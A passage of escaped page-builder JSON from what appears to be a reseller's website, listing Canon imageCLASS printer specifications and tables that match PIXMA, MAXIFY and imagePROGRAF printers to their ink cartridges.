Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td><td>Maintenance Cartridge MC-20<\\/td><\\/tr><tr><td>PFI-50 (Blue)<\\/td><\\/tr><tr><td>PFI-50 (Chroma Optimizer)<\\/td><\\/tr><tr><td>PFI-50 (Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Gray)<\\/td><\\/tr><tr><td>PFI-50 (Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Matte Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Photo Gray)<\\/td><\\/tr><tr><td>PFI-50 (Photo Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Red)<\\/td><\\/tr><tr><td>PFI-50 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td><td>CL-98 (Colour)<\\/td><\\/tr><tr><td>PG-88 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 